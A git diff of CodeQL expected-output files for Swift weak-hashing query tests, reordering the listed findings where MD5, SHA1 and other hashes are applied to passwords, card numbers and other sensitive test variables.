@@ -102,3 +53,52 @@ nodes | testCryptoSwift.swift:228:9:228:9 | passwd | semmle.label | passwd | | testCryptoSwift.swift:231:9:231:9 | passwd | semmle.label | passwd | subpaths +#select +| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | +| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | +| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | +| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | +| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | +| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | +| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | +| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | +| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | +| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | +| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | +| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | +| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | +| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | +| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | +| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | +| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | +| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | +| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | +| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | +| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. 
| testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | +| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | +| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | +| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | +| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | +| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | +| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | +| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | +| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected index 67c2e2f49302..ebb8154b0f8e 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected 
@@ -1,40 +1,3 @@ -#select -| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | -| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | edges | testCryptoKit.swift:230:18:230:38 | call to Data.init(_:) | testCryptoKit.swift:231:44:231:44 | value1 | provenance | | | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:230:23:230:34 | .utf8 | provenance | | 
@@ -112,3 +75,40 @@ nodes | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | semmle.label | creditCardNumber | | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | semmle.label | creditCardNumber | subpaths +#select +| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
